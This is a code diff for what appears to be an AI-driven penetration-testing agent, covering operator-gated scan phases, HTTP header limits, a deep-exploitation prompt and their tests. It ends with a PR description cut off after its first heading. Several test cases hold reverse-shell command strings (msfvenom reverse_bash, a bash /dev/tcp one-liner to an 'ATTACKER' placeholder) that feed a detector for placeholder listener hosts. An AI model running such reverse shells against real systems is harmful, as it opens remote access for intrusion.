+  async function advancePhase(target) {
+    const btn = document.getElementById('cmd-phase-advance-btn');
+    const fb  = document.getElementById('cmd-smith-feedback');
+    const tgt = target || (btn && btn.dataset.target) || undefined;
+    // Two-step inline confirm (matches completeScan): first click arms, second fires.
+    if (btn && btn.dataset.armed !== '1') {
+      btn.dataset.armed = '1';
+      if (fb) fb.textContent = 'Click Advance again to move' + (tgt ? ' to ' + tgt : '') +
+                               ' — Phase A stays exactly as deep as you left it.';
+      setTimeout(() => { if (btn) btn.dataset.armed = '0'; if (fb) fb.textContent = ''; }, 5000);
+      return;
+    }
+    if (btn) { btn.dataset.armed = '0'; btn.disabled = true; }
+    try {
+      const res = await fetch('/api/phase/advance', {
+        method: 'POST', headers: { 'Content-Type': 'application/json' },
+        body: JSON.stringify(tgt ? { target: tgt } : {}),
+      }).then(r => r.json());
+      if (fb) fb.textContent = res.ok ? ('✓ Advanced ' + res.from + ' → ' + res.to)
+                                      : ('✗ ' + (res.error || 'could not advance'));
+      _pollPhase();
+      setTimeout(() => { if (fb) fb.textContent = ''; }, 4000);
+    } catch (e) { if (fb) fb.textContent = '✗ Request failed'; }
+    if (btn) btn.disabled = false;
+  }
+
   let _completeConfirmExpires = 0;
 
   async function completeScan() {

--- a/mcp_server/http_tools.py
+++ b/mcp_server/http_tools.py
@@ -18,6 +18,13 @@ _INLINE_BODY_CHARS = 8_000
 # so the model can grep/page a large OpenAPI spec or JS bundle via
 # session(action='artifact'). ~1 MB bound guards against pathological downloads.
 _MAX_ARTIFACT_BODY = 1_000_000
+# aiohttp's default HTTP line/field parser limit is 8190 bytes, so a legitimately large
+# response line — a huge Set-Cookie / `token=<big JWT>` header, a verbose error page, or
+# data reflected into a header (e.g. exfiltration-via-header during exploitation) — raises
+# LineTooLong ("Got more than 8190 bytes when reading"), which the tool reports as a failure
+# and the QA health check then MISREADS as a target-reachability problem. Raise the client
+# parser limits so large-but-valid responses parse instead of erroring.
+_CLIENT_MAX_HDR = 256 * 1024
 
 
 def _write_text(path: str, content: str) -> None:
@@ -79,7 +86,8 @@ async def http_probe(url, method="GET", headers=None, body=None, timeout_s=20) -
     only reads responses to feed an oracle; it sends no secrets to protect."""
     import aiohttp
     try:
-        async with aiohttp.ClientSession() as session:
+        async with aiohttp.ClientSession(
+            max_line_size=_CLIENT_MAX_HDR, max_field_size=_CLIENT_MAX_HDR) as session:
             async with session.request(
                 method, url, headers=headers or {}, data=body,
                 timeout=aiohttp.ClientTimeout(total=timeout_s), ssl=False,  # NOSONAR S4830 — intentional: see docstring
@@ -101,7 +109,8 @@ async def _do_request(url, method, headers, body, opts):
     call_id = cost_tracker.start("http_request")
     artifact_raw = None
     try:
-        async with aiohttp.ClientSession() as session:
+        async with aiohttp.ClientSession(
+            max_line_size=_CLIENT_MAX_HDR, max_field_size=_CLIENT_MAX_HDR) as session:
             async with session.request(
                 method, url,
                 headers=headers or {},

--- a/mcp_server/report_tools/coverage.py
+++ b/mcp_server/report_tools/coverage.py
@@ -436,6 +436,60 @@ async def _do_coverage_sweep(data, cov):
     return _format_sweep_report(cells, applied, candidates, blocked, inconclusive, oob_note)
 
 
+def _phase_a_deepwork_redirect(cov_type: str) -> str:
+    """Phase A refuses a DRAIN op (sweep / bulk_tested / next_batch / auto_crosscutting) and
+    points the model BACK to the specific deep work it still owes — un-pursued high findings,
+    un-run applicable skills, unattempted exploit bridges — instead of letting it escape to
+    breadth. The refusal is what keeps Phase A alive (the deep, hours-long phase the lean early
+    runs did); naming the remaining work is what keeps it productive. Fail-soft: if findings /
+    session can't be read, falls back to the generic deep-work nudge."""
+    lines: list[str] = []
+    try:
+        from core import findings as _findings
+        from core import session as _sess
+        from core.session import phases as _phases
+        data = _findings._load()
+        sess = _sess.get() or {}
+        chain_fids = _phases._chain_fids(data)
+        unpursued = [f for f in data.get("findings", [])
+                     if f.get("severity") in ("high", "critical")
+                     and f.get("status", "confirmed") != "false_positive"
+                     and not _phases._pursued(f, chain_fids)]
+        if unpursued:
+            from core.prompt_fence import fence as _fence
+            sample = "; ".join(_fence(f.get("title", "")) for f in unpursued[:5])
+            more = f" (+{len(unpursued) - 5} more)" if len(unpursued) > 5 else ""
+            lines.append(
+                f"  • {len(unpursued)} high/critical finding(s) NOT yet driven to a terminal: "
+                f"{sample}{more}. Chain each onward (report(action='chain', ...)); if one truly "
+                "dead-ends, dismiss its escalation_lead with a rationale.")
+        worked = _phases._worked_skills(sess)
+        owed = sorted({s for g in (sess.get("gates", []) or [])
+                       if g.get("status") != "satisfied"
+                       for s in (set(g.get("required_skills", []) or []) - worked)})
+        if owed:
+            lines.append(
+                f"  • Applicable skill(s) not yet run: {', '.join('/' + s for s in owed)} — "
+                "set_skill + invoke each; they are DEPTH work and Phase A won't advance until they have.")
+        bridges = _phases.open_bridges(data)
+        if bridges:
+            lines.append(
+                f"  • {bridges} provable exploit bridge(s) unattempted — report(action='chain', "
+                "data={type:'suggest'}), then prove or dismiss each.")
+    except Exception:
+        pass
+    body = "\n".join(lines) if lines else (
+        "  • Drive every confirmed finding to its terminal and attempt every provable exploit bridge.")
+    return (
+        f"DEFERRED — '{cov_type}' is breadth cell-testing (Phase B work) and you are in PHASE A "
+        "(deep exploitation). The matrix is being built for Phase B, but do NOT drain it yet — do "
+        "the DEEP work still owed:\n" + body + "\n"
+        "The scan AUTO-ADVANCES to Phase B only when depth is exhausted (all applicable skills run, "
+        "every high/critical driven to a terminal or a documented dead-end, and no provable bridge "
+        "left) — the sweep runs THEN. Keep hunting; don't burn cells."
+    )
+
+
 async def _do_coverage(data):
     from core import coverage as cov
 
@@ -454,15 +508,7 @@ async def _do_coverage(data):
         from core import session as _sess
         from core.session import phases as _phases
         if _phases.current_phase(_sess.get()) == _phases.EXPLOIT:
-            return (
-                f"DEFERRED — '{cov_type}' is breadth cell-testing (Phase B work). You are in "
-                "PHASE A (deep exploitation): the coverage matrix is being built for later, but do "
-                "NOT sweep/drain it yet. Instead, drive every confirmed finding to its terminal "
-                "(RCE / pivot / full takeover), chain the mandatory skills, and file "
-                "report(action='chain', ...). The scan AUTO-ADVANCES to Phase B the moment depth "
-                "saturates (every high/critical driven to a terminal or a documented dead-end) — "
-                "run the sweep then."
-            )
+            return _phase_a_deepwork_redirect(cov_type)
 
     if cov_type == "endpoint":
         return await _do_coverage_endpoint(data, cov)

--- a/tests/conftest.py
+++ b/tests/conftest.py
@@ -101,6 +101,42 @@ def isolate_session(tmp_path, monkeypatch):
 
 
 @pytest.fixture(autouse=True)
+def isolate_api_runtime_files(tmp_path, monkeypatch):
+    """HARD guard: no test may destroy real runtime state through the API layer.
+
+    DELETE /api/clear (core.api_server.routes.scan_state_routes.api_clear) wipes session.json,
+    coverage, logs, artifacts, pocs, steering, cost, recovery + metrics using the core.api_server
+    module-level path constants, _REPO_ROOT, core.logger._LOG_DIR, core.coverage and core.findings.
+    Several api tests call DELETE /api/clear; without this redirect those wipes hit the REAL repo
+    files and DESTROY a live/completed scan's state whenever the suite runs in a working tree that
+    holds one — this actually happened once (a full-suite run erased a completed scan's
+    session.json, coverage_matrix.json and pentest.log). Redirect every path api_clear touches to
+    tmp so a test clear is inert on real data. Opt-in findings/coverage fixtures override these
+    (last monkeypatch wins) for tests that need a specific path."""
+    import core.api_server as _api
+    import core.logger as _logger
+    import core.coverage as _coverage
+    import core.findings as _findings
+    # Distinct guard dir — NOT tmp_path/"logs", which several tests create themselves via
+    # (tmp_path/"logs").mkdir() and would collide with (FileExistsError).
+    guard = tmp_path / "_apiclear_guard"
+    guard.mkdir(exist_ok=True)
+    monkeypatch.setattr(_api, "_REPO_ROOT", guard, raising=False)
+    for _name, _rel in (("_SESSION_FILE", "session.json"),
+                        ("_QUICK_LOG_FILE", "quick_log.json"),
+                        ("_QA_STATE_FILE", "qa_state.json"),
+                        ("_COST_FILE", "session_cost.json"),
+                        ("_STEERING_FILE", "steering_queue.json"),
+                        ("_SMITH_PID_FILE", "smith.pid"),
+                        ("_SMITH_CLIENT_FILE", "smith.client")):
+        if hasattr(_api, _name):
+            monkeypatch.setattr(_api, _name, guard / _rel, raising=False)
+    monkeypatch.setattr(_logger, "_LOG_DIR", guard, raising=False)
+    monkeypatch.setattr(_coverage, "COVERAGE_FILE", tmp_path / "coverage_matrix.json", raising=False)
+    monkeypatch.setattr(_findings, "FINDINGS_FILE", tmp_path / "findings.json", raising=False)
+
+
+@pytest.fixture(autouse=True)
 def reset_findings_lock(monkeypatch):
     """
     asyncio.Lock() attaches to the running event loop on first use.

--- a/tests/test_api_smith_endpoints.py
+++ b/tests/test_api_smith_endpoints.py
@@ -726,6 +726,7 @@ class TestWatchdogNoProgressBackoff:
         monkeypatch.setattr(api.smith, "_watchdog_last_progress", None)
         monkeypatch.setattr(api.smith, "_watchdog_scan_key", "")
         monkeypatch.setattr(api.smith, "_watchdog_scan_restarts", 0)
+        monkeypatch.setattr(api.smith, "_watchdog_last_respawn_progress", ())
 
     def test_snapshot_reads_findings_and_cells_not_mtime(self, tmp_path, monkeypatch):
         # The fingerprint is (findings, addressed cells) ONLY — quick_log mtime is
@@ -828,11 +829,14 @@ class TestWatchdogNoProgressBackoff:
         operator instead of spawning again."""
         monkeypatch.setattr(api, "_watchdog_last_restart_ts", 0.0)
         monkeypatch.setattr(api, "_watchdog_restart_count_window", [])
-        # This scan has already been auto-respawned up to the cap.
+        # This scan has been auto-respawned up to the cap WITH NO PROGRESS since (the runaway
+        # signature: the snapshot equals the last-respawn mark, so the progress-reset does NOT fire).
         monkeypatch.setattr(api.smith, "_watchdog_scan_key", "scan-abc")
         monkeypatch.setattr(api.smith, "_watchdog_scan_restarts", api._WATCHDOG_MAX_PER_SCAN)
+        monkeypatch.setattr(api.smith, "_watchdog_last_respawn_progress", (3, 7))
         with patch.object(api, "_mcp_sse_alive", return_value=True), \
              patch.object(api, "_read_json", return_value={"id": "scan-abc"}), \
+             patch.object(api.smith, "_scan_progress_snapshot", return_value=(3, 7)), \
              patch.object(api, "_watchdog_should_escalate_no_progress", return_value=False), \
              patch.object(api, "_spawn_smith", new_callable=AsyncMock) as mock_spawn, \
              patch.object(api.smith, "_watchdog_notify") as mock_notify:
@@ -840,6 +844,29 @@ class TestWatchdogNoProgressBackoff:
         mock_spawn.assert_not_called()
         codes = [c.args[2] for c in mock_notify.call_args_list]
         assert "WATCHDOG_PER_SCAN_CAP" in codes
+
+    @pytest.mark.asyncio
+    async def test_respawn_flow_resets_cap_when_scan_progressed(self, monkeypatch):
+        """REGRESSION: a healthy LONG scan that legitimately respawns past the cap but keeps making
+        progress must NOT be suppressed. When the scan ADVANCED since the last respawn (snapshot
+        differs from the mark), the per-scan counter resets — only CONSECUTIVE futile respawns trip
+        the cap. This is the '#156 stalled my deep scan at 8 respawns' fix."""
+        monkeypatch.setattr(api, "_watchdog_last_restart_ts", 0.0)
+        monkeypatch.setattr(api, "_watchdog_restart_count_window", [])
+        monkeypatch.setattr(api.smith, "_watchdog_scan_key", "scan-abc")
+        monkeypatch.setattr(api.smith, "_watchdog_scan_restarts", api._WATCHDOG_MAX_PER_SCAN)  # at cap
+        monkeypatch.setattr(api.smith, "_watchdog_last_respawn_progress", (3, 7))
+        with patch.object(api, "_mcp_sse_alive", return_value=True), \
+             patch.object(api, "_read_json", return_value={"id": "scan-abc"}), \
+             patch.object(api.smith, "_scan_progress_snapshot", return_value=(4, 9)), \
+             patch.object(api, "_watchdog_should_escalate_no_progress", return_value=False), \
+             patch.object(api, "_detect_active_client", return_value="opencode"), \
+             patch.object(api, "_spawn_smith", new_callable=AsyncMock,
+                          return_value=(True, 4242)) as mock_spawn, \
+             patch("core.notifiers.notify"):
+            await api.smith._watchdog_respawn_flow(time.time())
+        mock_spawn.assert_awaited_once()                 # progress reset the cap → respawn allowed
+        assert api.smith._watchdog_scan_restarts == 1    # reset to 0, then +1 for this respawn
 
     @pytest.mark.asyncio
     async def test_respawn_flow_resets_per_scan_count_on_new_scan(self, monkeypatch):

--- a/tests/test_phase_control.py
+++ b/tests/test_phase_control.py
@@ -1,0 +1,76 @@
+"""Human-gated phase progression — typed-steer parser + /api/phase endpoints.
+
+Phases never auto-advance; the operator drives A→B→C via a dashboard button
+(/api/phase/advance) or a typed steer ("advance to phase B", "next phase")
+parsed server-side in /api/steer.
+"""
+from fastapi.testclient import TestClient
+
+import core.session
+from core.api_server import app
+from core.api_server.routes.scan_state_routes import _parse_phase_steer
+
+client = TestClient(app)
+
+
+class TestParsePhaseSteer:
+    def test_advance_to_phase_b(self):
+        assert _parse_phase_steer("advance to phase B") == (True, "coverage")
+
+    def test_go_to_phase_c(self):
+        assert _parse_phase_steer("go to phase c") == (True, "synthesis")
+
+    def test_named_coverage_phase(self):
+        assert _parse_phase_steer("start the coverage phase") == (True, "coverage")
+
+    def test_named_synthesis_phase(self):
+        assert _parse_phase_steer("move to synthesis phase") == (True, "synthesis")
+
+    def test_next_phase_and_advance_phase(self):
+        assert _parse_phase_steer("next phase") == (True, None)
+        assert _parse_phase_steer("advance the phase") == (True, None)
+
+    def test_normal_steer_is_not_a_phase_advance(self):
+        assert _parse_phase_steer("focus on /api/users") == (False, None)
+        assert _parse_phase_steer("skip rate_limit cells") == (False, None)
+
+    def test_bare_coverage_word_is_not_an_advance(self):
+        # 'coverage' unqualified by 'phase' (e.g. "go check the coverage tab") must NOT advance —
+        # the word is too common to treat as an operator phase command.
+        assert _parse_phase_steer("go check the coverage tab") == (False, None)
+
+
+class TestPhaseEndpoints:
+    def test_get_phase_defaults_exploit(self):
+        core.session.start("example.com")
+        body = client.get("/api/phase").json()
+        assert body["phase"] == "exploit" and body["next"] == "coverage"
+
+    def test_advance_endpoint_moves_forward(self):
+        core.session.start("example.com")
+        r = client.post("/api/phase/advance", json={})
+        assert r.status_code == 200
+        assert r.json() == {"ok": True, "from": "exploit", "to": "coverage"}
+        assert client.get("/api/phase").json()["phase"] == "coverage"
+
+    def test_advance_endpoint_explicit_target(self):
+        core.session.start("example.com")
+        assert client.post("/api/phase/advance", json={"target": "synthesis"}).json()["to"] == "synthesis"
+
+    def test_advance_endpoint_rejects_backward(self):
+        core.session.start("example.com")
+        client.post("/api/phase/advance", json={"target": "coverage"})
+        r = client.post("/api/phase/advance", json={"target": "exploit"})
+        assert r.status_code == 400 and r.json()["ok"] is False
+
+    def test_steer_routes_phase_advance(self):
+        core.session.start("example.com")
+        r = client.post("/api/steer", json={"message": "advance to phase B"})
+        assert r.status_code == 200 and r.json().get("phase_advanced") is True
+        assert client.get("/api/phase").json()["phase"] == "coverage"
+
+    def test_steer_normal_message_does_not_advance(self):
+        core.session.start("example.com")
+        r = client.post("/api/steer", json={"message": "focus on /api/login SQLi"})
+        assert r.status_code == 200 and not r.json().get("phase_advanced")
+        assert client.get("/api/phase").json()["phase"] == "exploit"

--- a/tests/test_phases.py
+++ b/tests/test_phases.py
@@ -24,6 +24,33 @@ class TestPhaseState:
         assert ph.current_phase({"scan_phase": "bogus"}) == "exploit"  # unknown → default
 
 
+class TestReconWiring:
+    def test_tools_run_reads_tools_called_scanner_names(self):
+        # REGRESSION (BUG A): recon scanners are recorded in `tools_called` as SCANNER names
+        # (httpx/nmap/...), while tool_invocations[].tool holds DISPATCHER names
+        # (http_request/kali). _tools_run must union BOTH — reading only tool_invocations left
+        # _recon_done permanently False on real scans (scanner names never appear there), so
+        # depth_saturated was always False and the advisory hint could never fire.
+        s = {"scan_phase": "exploit",
+             "tools_called": ["httpx", "naabu", "nuclei", "ffuf", "spider", "kali"],
+             "tool_invocations": [{"tool": "http_request"}, {"tool": "kali"}],
+             "skill_history": [{"skill": "web-exploit", "worked": True}]}
+        assert "httpx" in ph._tools_run(s)
+        assert ph._recon_done(s) is True
+
+    def test_recon_done_false_when_only_dispatcher_names(self):
+        s = {"tools_called": [], "tool_invocations": [{"tool": "http_request"}]}
+        assert ph._recon_done(s) is False
+
+
+class TestForcedNext:
+    def test_forward_only_and_stops_at_synthesis(self):
+        assert ph.forced_next("exploit") == "coverage"
+        assert ph.forced_next("coverage") == "synthesis"
+        assert ph.forced_next("synthesis") is None
+        assert ph.forced_next("bogus") == "coverage"   # unknown → treat as start
+
+
 class TestDepthSaturation:
     def _fd(self, findings, chains=None):
         return {"findings": findings, "chains": chains or []}
@@ -51,6 +78,44 @@ class TestDepthSaturation:
         s = {"scan_phase": "exploit", "tool_invocations": [{"tool": "nmap"}],
              "skill_history": [{"skill": "network-assess", "worked": True}]}
         assert ph.depth_saturated(s, self._fd([_crit(title="RCE via code execution")])) is True
+
+    # ── Skill-exhaustion bar (Phase A runs the FULL applicable-skill sweep, not just one) ──
+    def test_owed_skill_gate_blocks_saturation(self, monkeypatch):
+        # The deep hunt ran ONE skill (web-exploit) but a discovered surface opened a param-fuzz
+        # gate that hasn't worked → depth is NOT exhausted, keep hunting (don't drift to breadth).
+        monkeypatch.setattr(ph, "open_bridges", lambda fd: 0)
+        monkeypatch.setattr(ph, "_enforce_deep_skills", lambda: True)
+        s = _sess(gates=[{"id": "params", "status": "pending",
+                          "required_skills": ["param-fuzz"], "satisfied_skills": []}])
+        assert ph.depth_saturated(s, self._fd([])) is False
+
+    def test_all_gate_skills_worked_saturates(self, monkeypatch):
+        # Every applicable skill did real work → the deep sweep is complete → advance. Reads the
+        # per-skill `worked` flag directly, so a gate still marked 'pending' (reconcile not yet run)
+        # does not falsely block.
+        monkeypatch.setattr(ph, "open_bridges", lambda fd: 0)
+        monkeypatch.setattr(ph, "_enforce_deep_skills", lambda: True)
+        s = _sess(skill_history=[{"skill": "web-exploit", "worked": True},
+                                 {"skill": "param-fuzz", "worked": True}],
+                  gates=[{"id": "params", "status": "pending",
+                          "required_skills": ["param-fuzz"], "satisfied_skills": []}])
+        assert ph.depth_saturated(s, self._fd([])) is True
+
+    def test_satisfied_gate_never_blocks(self, monkeypatch):
+        monkeypatch.setattr(ph, "open_bridges", lambda fd: 0)
+        monkeypatch.setattr(ph, "_enforce_deep_skills", lambda: True)
+        s = _sess(gates=[{"id": "g", "status": "satisfied",
+                          "required_skills": ["reverse-shell"], "satisfied_skills": ["reverse-shell"]}])
+        assert ph.depth_saturated(s, self._fd([])) is True
+
+    def test_weak_profile_keeps_single_skill_bar(self, monkeypatch):
+        # On a weak local profile the full-sweep requirement is dropped (else the small model
+        # game-then-stalls) — an owed gate does NOT hold Phase A.
+        monkeypatch.setattr(ph, "open_bridges", lambda fd: 0)
+        monkeypatch.setattr(ph, "_enforce_deep_skills", lambda: False)
+        s = _sess(gates=[{"id": "params", "status": "pending",
+                          "required_skills": ["param-fuzz"], "satisfied_skills": []}])
+        assert ph.depth_saturated(s, self._fd([])) is True
 
     def test_unpursued_high_blocks_saturation(self, monkeypatch):
         monkeypatch.setattr(ph, "open_bridges", lambda fd: 0)

--- a/tests/test_qa_agent.py
+++ b/tests/test_qa_agent.py
@@ -1802,6 +1802,102 @@ def test_repeated_tool_failure_fires():
         mock_trigger.assert_called_once()
 
 
+def test_repeated_tool_failure_client_size_error_is_advisory_not_hir():
+    # aiohttp LineTooLong ("Got more than 8190 bytes") on a RESPONDING target is not a
+    # reachability failure — it must NOT halt the scan with an HIR (the misdiagnosis that fired
+    # 3× on a healthy target during exfiltration-via-header). It surfaces as a non-blocking
+    # advisory instead, and never calls trigger_intervention.
+    with patch("core.session.get_intervention", return_value=None), \
+         patch("core.session.trigger_intervention") as mock_trigger:
+        err = "400, message=\"Got more than 8190 bytes when reading: b'token=eyJ...'\", url='http://t/login'"
+        entries = [{"type": "TOOL", "name": "http_request", "target": "http://t",
+                    "ts": _ts(1), "error": err} for _ in range(3)]
+        alert = _check_repeated_tool_failure(entries)
+        assert alert is not None
+        assert alert["code"] == "TOOL_RESPONSE_TOO_LARGE"
+        assert alert["blocking"] is False
+        assert "not a target-reachability" in alert["message"].lower()
+        mock_trigger.assert_not_called()   # no scan-halting HIR
+
+
+def test_repeated_tool_failure_network_error_still_fires_hir(monkeypatch):
+    # A genuine network-level failure (connection refused / timeout) still gets the reachability HIR.
+    import core.qa_agent as qa_mod
+    monkeypatch.setattr(qa_mod, "_last_hir_trigger_ts", {})   # clear cross-test HIR dedup
+    with patch("core.session.get_intervention", return_value=None), \
+         patch("core.session.trigger_intervention") as mock_trigger:
+        entries = [{"type": "TOOL", "name": "http_request", "target": "http://t", "ts": _ts(1),
+                    "error": "Cannot connect to host t:80 ssl:default [Connection refused]"}
+                   for _ in range(3)]
+        alert = _check_repeated_tool_failure(entries)
+        assert alert["code"] == "HIR_TOOL_FAILURE"
+        mock_trigger.assert_called_once()
+
+
+def test_is_client_response_size_error_classification():
+    from core.qa_agent.checks_health import _is_client_response_size_error as f
+    assert f("Got more than 8190 bytes when reading: b'token=...'")
+    assert f("400, message='Header value is too long'")
+    assert f("aiohttp LineTooLong: ...")
+    assert not f("Cannot connect to host example.com:443 [Connection refused]")
+    assert not f("TimeoutError")
+    assert not f("")
+
+
+# ── reverse-shell placeholder-LHOST guard ────────────────────────────────────
+def _kali_cmd_entry(command, offset_min=1):
+    return {"type": "TOOL", "name": "kali", "command": command, "target": "http://t",
+            "ts": _ts(offset_min)}
+
+
+def test_reverse_shell_placeholder_lhost_advisory():
+    from core.qa_agent.checks_health import _check_reverse_shell_placeholder_lhost as f
+    entries = [_kali_cmd_entry(
+        "msfvenom -p cmd/unix/reverse_bash LHOST=attacker.example.com LPORT=4444 -f raw")]
+    alert = f(entries, {"known_assets": {}})
+    assert alert is not None
+    assert alert["code"] == "REVERSE_SHELL_NO_LHOST"
+    assert alert["blocking"] is False
+    assert "oob_mint" in alert["message"] and "wishlist_add" in alert["message"]
+
+
+def test_reverse_shell_real_operator_lhost_suppresses_advisory():
+    # An operator listener (SMITH_LHOST → known_assets.attacker_host) makes the payload
+    # legitimate — no nag.
+    from core.qa_agent.checks_health import _check_reverse_shell_placeholder_lhost as f
+    entries = [_kali_cmd_entry("msfvenom -p ... LHOST=attacker.example.com LPORT=4444")]
+    sess = {"known_assets": {"attacker_host": {"lhost": "5.6.7.8", "lport": 4444}}}
+    assert f(entries, sess) is None
+
+
+def test_reverse_shell_real_ip_lhost_no_advisory():
+    from core.qa_agent.checks_health import _check_reverse_shell_placeholder_lhost as f
+    entries = [_kali_cmd_entry("msfvenom -p cmd/unix/reverse_bash LHOST=1.2.3.4 LPORT=4444 -f raw")]
+    assert f(entries, {"known_assets": {}}) is None
+
+
+def test_reverse_shell_attacker_prefix_real_host_no_false_positive():
+    # REGRESSION: a genuine hostname that merely STARTS with 'attacker' (attacker.corp.com) must
+    # NOT be flagged — the old loose-substring match ('lhost=attacker') falsely triggered here.
+    from core.qa_agent.checks_health import _check_reverse_shell_placeholder_lhost as f
+    entries = [_kali_cmd_entry("msfvenom -p cmd/unix/reverse_bash LHOST=attacker.corp.com LPORT=4444")]
+    assert f(entries, {"known_assets": {}}) is None
+
+
+def test_reverse_shell_literal_attacker_placeholder_in_devtcp():
+    # The /dev/tcp/ATTACKER/PORT one-liner form is also caught (extracted host token 'attacker').
+    from core.qa_agent.checks_health import _check_reverse_shell_placeholder_lhost as f
+    entries = [_kali_cmd_entry("bash -i >& /dev/tcp/ATTACKER/4444 0>&1")]
+    alert = f(entries, {"known_assets": {}})
+    assert alert is not None and alert["code"] == "REVERSE_SHELL_NO_LHOST"
+
+
+def test_reverse_shell_non_revshell_command_ignored():
+    from core.qa_agent.checks_health import _check_reverse_shell_placeholder_lhost as f
+    entries = [_kali_cmd_entry("nmap -sV -p- attacker.example.com")]   # placeholder host but not a revshell
+    assert f(entries, {"known_assets": {}}) is None
+
+
 # ── _cycle() Telegram notification path ───────────────────────────────────────
 
 @pytest.mark.asyncio

--- a/tests/test_report_tools.py
+++ b/tests/test_report_tools.py
@@ -671,3 +671,30 @@ async def test_coverage_drain_allowed_in_coverage_phase(monkeypatch):
     # in Phase B the sweep is not gated (reaches the real handler → no DEFERRED redirect)
     out = await _do_coverage({"type": "sweep"})
     assert "DEFERRED" not in out
+
+
+def test_phase_a_redirect_names_remaining_deepwork(monkeypatch):
+    # The Phase-A DRAIN refusal must POINT BACK to the specific deep work owed — un-pursued high
+    # findings + un-run applicable skills + unattempted bridges — not a bare 'go deeper'. This is
+    # what keeps Phase A productive (and stops /param-fuzz-style skills starving) while the refusal
+    # itself keeps Phase A long. Objective depth-exhaustion advances the phase, never this nudge.
+    from mcp_server.report_tools import coverage as covmod
+    import core.session as sess
+    import core.findings as findings
+    from core.session import phases as ph
+    monkeypatch.setattr(sess, "get", lambda: {
+        "scan_phase": "exploit",
+        "skill_history": [{"skill": "web-exploit", "worked": True}],
+        "gates": [{"id": "params", "status": "pending",
+                   "required_skills": ["param-fuzz"], "satisfied_skills": []}],
+    })
+    monkeypatch.setattr(findings, "_load", lambda: {"findings": [
+        {"id": "f1", "severity": "critical", "title": "Confirmed SQLi in /login",
+         "description": "", "status": "confirmed"}], "chains": []})
+    monkeypatch.setattr(ph, "open_bridges", lambda fd: 2)
+    out = covmod._phase_a_deepwork_redirect("sweep")
+    assert "DEFERRED" in out and "PHASE A" in out
+    assert "Confirmed SQLi in /login" in out            # names the un-pursued finding
+    assert "1 high/critical finding(s)" in out
+    assert "/param-fuzz" in out                          # names the owed applicable skill
+    assert "2 provable exploit bridge" in out            # names the unattempted bridges

--- a/tests/test_session.py
+++ b/tests/test_session.py
@@ -986,3 +986,46 @@ def test_maybe_advance_phase_never_auto_advances(monkeypatch):
     assert core.session.maybe_advance_phase() is None
     assert core.session.get()["scan_phase"] == "exploit"              # unchanged — no auto-advance
     assert core.session.get().get("phase_advice") == "coverage"       # advisory recorded
+
+
+# ---------------------------------------------------------------------------
+# SMITH_LHOST → known_assets.attacker_host (operator reverse-shell listener)
+# ---------------------------------------------------------------------------
+
+def test_start_reads_smith_lhost_env(monkeypatch):
+    monkeypatch.setenv("SMITH_LHOST", "1.2.3.4:9001")
+    sess = core.session.start("example.com")
+    assert sess["known_assets"].get("attacker_host") == {
+        "lhost": "1.2.3.4", "lport": 9001, "source": "SMITH_LHOST"}
+
+
+def test_start_lhost_defaults_port_4444(monkeypatch):
+    monkeypatch.setenv("SMITH_LHOST", "attacker.vps.example")
+    sess = core.session.start("example.com")
+    assert sess["known_assets"]["attacker_host"]["lport"] == 4444
+
+
+def test_start_no_lhost_env_no_attacker_host(monkeypatch):
+    monkeypatch.delenv("SMITH_LHOST", raising=False)
+    sess = core.session.start("example.com")
+    assert "attacker_host" not in sess["known_assets"]
+
+
+def test_start_lhost_ipv6_bracketed(monkeypatch):
+    monkeypatch.setenv("SMITH_LHOST", "[2001:db8::1]:9001")
+    sess = core.session.start("example.com")
+    assert sess["known_assets"]["attacker_host"] == {
+        "lhost": "2001:db8::1", "lport": 9001, "source": "SMITH_LHOST"}
+
+
+def test_start_lhost_ipv6_bare(monkeypatch):
+    monkeypatch.setenv("SMITH_LHOST", "::1")
+    sess = core.session.start("example.com")
+    ah = sess["known_assets"]["attacker_host"]
+    assert ah["lhost"] == "::1" and ah["lport"] == 4444
+
+
+def test_start_lhost_out_of_range_port_falls_back(monkeypatch):
+    monkeypatch.setenv("SMITH_LHOST", "1.2.3.4:70000")
+    sess = core.session.start("example.com")
+    assert sess["known_assets"]["attacker_host"]["lport"] == 4444

--- a/tests/test_session.py
+++ b/tests/test_session.py
@@ -936,3 +936,53 @@ def test_get_intervention_returns_none_when_no_intervention(tmp_path, monkeypatc
     monkeypatch.setattr(scan_session, "_SESSION_FILE", session_file)
     scan_session.start("https://example.com")
     assert scan_session.get_intervention() is None
+
+
+# ---------------------------------------------------------------------------
+# phase control — human-gated A→B→C (advance_phase / maybe_advance_phase)
+# ---------------------------------------------------------------------------
+
+def test_advance_phase_moves_one_step_forward():
+    core.session.start("example.com")
+    assert core.session.get()["scan_phase"] == "exploit"
+    r = core.session.advance_phase()
+    assert r == {"ok": True, "from": "exploit", "to": "coverage"}
+    assert core.session.get()["scan_phase"] == "coverage"
+    assert core.session.advance_phase()["to"] == "synthesis"
+
+
+def test_advance_phase_rejects_past_synthesis():
+    core.session.start("example.com")
+    core.session.advance_phase(); core.session.advance_phase()   # → synthesis
+    r = core.session.advance_phase()
+    assert r["ok"] is False and "final" in r["error"]
+    assert core.session.get()["scan_phase"] == "synthesis"
+
+
+def test_advance_phase_target_alias_jumps_forward():
+    core.session.start("example.com")
+    r = core.session.advance_phase("c")     # letter alias, jump exploit→synthesis
+    assert r == {"ok": True, "from": "exploit", "to": "synthesis"}
+
+
+def test_advance_phase_rejects_backward():
+    core.session.start("example.com")
+    core.session.advance_phase("coverage")
+    r = core.session.advance_phase("exploit")
+    assert r["ok"] is False and "not forward" in r["error"]
+    assert core.session.get()["scan_phase"] == "coverage"
+
+
+def test_advance_phase_no_running_scan():
+    assert core.session.advance_phase()["ok"] is False   # nothing started
+
+
+def test_maybe_advance_phase_never_auto_advances(monkeypatch):
+    # Even when the phase LOOKS saturated, maybe_advance_phase must NOT change scan_phase —
+    # phases are operator-gated now. It returns None and only records the advisory hint.
+    core.session.start("example.com")
+    from core.session import phases as ph
+    monkeypatch.setattr(ph, "next_phase", lambda *a, **k: "coverage")  # pretend saturated
+    assert core.session.maybe_advance_phase() is None
+    assert core.session.get()["scan_phase"] == "exploit"              # unchanged — no auto-advance
+    assert core.session.get().get("phase_advice") == "coverage"       # advisory recorded


### PR DESCRIPTION
Follow-up to the three-phase scan model (#154), plus a batch of tool/runtime fixes surfaced while running live scans. Four logical units:

## 1. Human-gated phase progression (`feat(phases)`)
